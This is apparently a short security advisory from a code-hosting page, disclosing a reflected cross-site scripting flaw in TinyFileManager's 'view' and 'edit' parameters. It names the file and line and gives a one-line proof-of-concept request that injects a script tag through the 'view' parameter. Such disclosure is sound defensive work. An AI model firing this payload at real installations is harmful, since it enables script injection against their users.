You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A reflected cross-site scripting (XSS) vulnerability exists in TinyFileManager.
User-supplied GET parameters (view and edit) are not properly sanitized when rendered in the HTML <title> tag.
Affected Component
File: tinyfilemanager.php
Line: 3990
php
<title> | </title>
Proof of Concept (PoC)
GET /tinyfilemanager.php?view="><script>alert('XSS')</script>